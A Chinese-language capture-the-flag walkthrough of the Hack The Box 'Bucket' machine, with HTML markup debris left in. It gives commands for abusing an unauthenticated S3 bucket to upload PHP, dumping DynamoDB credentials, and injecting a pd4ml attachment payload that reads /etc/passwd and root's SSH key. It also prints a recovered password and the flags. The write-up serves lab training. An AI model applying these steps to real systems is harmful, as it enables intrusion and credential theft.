HTB靶机Bucket渗透测试教学文档<\/h1>

1. 初始信息收集<\/h2>

添加hosts记录<\/strong>：<\/p>

将bucket.htb<\/code>和s3.bucket.htb<\/code>添加到本地hosts文件<\/li>
访问http:\/\/bucket.htb\/<\/code>并检查页面源代码<\/li> <\/ul> <\/li>
发现子域名<\/strong>：<\/p> 在页面头部信息中发现子域名s3.bucket.htb<\/code><\/li> 该子域名路径http:\/\/s3.bucket.htb\/adserver\/images\/bug.jpg<\/code>暗示了Amazon S3服务<\/li> <\/ul> <\/li> <\/ol> 2. Amazon S3基础知识<\/h2> 核心概念<\/strong>：<\/p> Bucket（桶）<\/strong>：存储对象的容器<\/li> Object（对象）<\/strong>：存储在桶中的基本实体（文件）<\/li> Key<\/strong>：对象的唯一标识符<\/li> <\/ul> <\/li> 访问方式<\/strong>：<\/p> Path-style请求<\/strong>： https:\/\/s3.<region>.amazonaws.com\/<bucket-name>\/<key> 示例：https:\/\/s3.us-west-2.amazonaws.com\/amzn-s3-demo-bucket1\/puppy.jpg <\/code><\/pre> <\/li> Virtual-hosted–style请求<\/strong>： https:\/\/<bucket-name>.s3.<region>.amazonaws.com\/<key> 示例：https:\/\/amzn-s3-demo-bucket1.s3.us-west-2.amazonaws.com\/puppy.png <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ol> 3. 枚举和利用S3服务<\/h2> 目录扫描<\/strong>：<\/p> 发现\/health<\/code>和\/shell<\/code>端点<\/li> <\/ul> <\/li> 使用AWS CLI连接<\/strong>：<\/p> # 列出所有bucket<\/span> <\/span><\/span>aws --endpoint-url=<\/span>http:\/\/s3.bucket.htb s3 ls <\/span><\/span> <\/span><\/span># 列出特定bucket内容<\/span> <\/span><\/span>aws --endpoint-url=<\/span>http:\/\/s3.bucket.htb s3 ls s3:\/\/adserver <\/span><\/span><\/code><\/pre><\/li> 文件上传测试<\/strong>：<\/p> 创建PHP测试文件abc.php<\/code>： <?<\/span>php<\/span> phpinfo<\/span>(); ?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 上传文件： aws --endpoint-url=<\/span>http:\/\/s3.bucket.htb s3 cp abc.php s3:\/\/adserver\/ <\/span><\/span><\/code><\/pre><\/li> 访问http:\/\/bucket.htb\/abc.php<\/code>验证解析<\/li> <\/ul> <\/li> 获取反弹shell<\/strong>：<\/p> 上传PHP反弹shell脚本并执行<\/li> <\/ul> <\/li> <\/ol> 4. 权限提升前期<\/h2> 发现受限目录<\/strong>：<\/p> \/var\/www\/bucket-app<\/code>目录无访问权限<\/li> 使用getfacl<\/code>发现joy<\/code>用户有读取和执行权限<\/li> <\/ul> <\/li> 发现DynamoDB信息<\/strong>：<\/p> 在home目录发现db.php<\/code>文件，包含新的endpoint-url<\/li> <\/ul> <\/li> DynamoDB枚举<\/strong>：<\/p> # 列出表<\/span> <\/span><\/span>aws dynamodb list-tables --endpoint-url http:\/\/localhost:4566 <\/span><\/span> <\/span><\/span># 查询users表内容<\/span> <\/span><\/span>aws dynamodb scan --table-name users --endpoint-url http:\/\/localhost:4566 <\/span><\/span><\/code><\/pre> 获取三组用户凭据，尝试SSH登录<\/li> <\/ul> <\/li> 获取初始flag<\/strong>：<\/p> 使用凭据n2vM-<_K_Q:.Aa2<\/code>SSH登录roy<\/code>用户<\/li> 获取第一个flag：3b55b52d69515bd509b3aa744aebde7b<\/code><\/li> <\/ul> <\/li> <\/ol> 5. 深入利用DynamoDB<\/h2> 分析index.php逻辑<\/strong>：<\/p> POST参数action=get_alerts<\/code>时：连接DynamoDB查询alerts表<\/li> 过滤包含"Ransomware"关键字的title<\/li> 将匹配的data字段写入随机命名的HTML文件<\/li> 使用pd4ml工具将HTML转换为PDF<\/li> <\/ul> <\/li> <\/ul> <\/li> 创建和操作alerts表<\/strong>：<\/p> # 创建表<\/span> <\/span><\/span>aws dynamodb create-table \ <\/span><\/span><\/span><\/span> --table-name alerts \ <\/span><\/span><\/span><\/span> --attribute-definitions AttributeName=<\/span>title,AttributeType=<\/span>S AttributeName=<\/span>data,AttributeType=<\/span>S \ <\/span><\/span><\/span><\/span> --key-schema AttributeName=<\/span>title,KeyType=<\/span>HASH AttributeName=<\/span>data,KeyType=<\/span>RANGE \ <\/span><\/span><\/span><\/span> --provisioned-throughput ReadCapacityUnits=<\/span>5,WriteCapacityUnits=<\/span>5<\/span> \ <\/span><\/span><\/span><\/span> --endpoint-url http:\/\/localhost:4566 <\/span><\/span> <\/span><\/span># 插入恶意数据<\/span> <\/span><\/span>aws dynamodb put-item \ <\/span><\/span><\/span><\/span> --table-name alerts \ <\/span><\/span><\/span><\/span> --item '{"title":{"S":"Ransomware"},"data":{"S":"<html>...<\/html>"}}'<\/span> \ <\/span><\/span><\/span><\/span> --endpoint-url http:\/\/localhost:4566 <\/span><\/span><\/code><\/pre><\/li> <\/ol> 6. 权限提升最终阶段<\/h2> 发现Apache服务<\/strong>：<\/p> 通过netstat -lnp<\/code>发现8000端口由root运行<\/li> <\/ul> <\/li> 端口转发<\/strong>：<\/p> ssh -L 8001:127.0.0.1:8000 roy@10.10.10.212 <\/span><\/span><\/code><\/pre><\/li> 利用pd4ml读取文件<\/strong>：<\/p> 构造包含文件读取payload的HTML： <attachment<\/span> src<\/span>=<\/span>"file:\/\/\/etc\/passwd"<\/span>> <\/span><\/span><\/code><\/pre><\/li> 触发转换： curl http:\/\/127.0.0.1:8001\/index.php --data 'action=get_alerts'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 读取root私钥<\/strong>：<\/p> 修改payload读取\/root\/.ssh\/id_rsa<\/code><\/li> 获取第二个flag：7fdda731a4cfd824a796d00b0e6b5c63<\/code><\/li> <\/ul> <\/li> <\/ol> 7. 关键知识点总结<\/h2> S3服务利用<\/strong>：<\/p> 识别S3端点<\/li> 使用AWS CLI操作未授权S3桶<\/li> 文件上传实现代码执行<\/li> <\/ul> <\/li> DynamoDB利用<\/strong>：<\/p> 创建和操作表<\/li> 通过应用逻辑注入恶意数据<\/li> <\/ul> <\/li> 权限提升技巧<\/strong>：<\/p> 利用文件转换服务读取敏感文件<\/li> 通过pd4ml的attachment特性实现LFI<\/li> 获取root私钥实现权限提升<\/li> <\/ul> <\/li> 工具使用<\/strong>：<\/p> AWS CLI<\/li> 目录扫描工具<\/li> 端口转发技术<\/li> 文件包含利用<\/li> <\/ul> <\/li> <\/ol>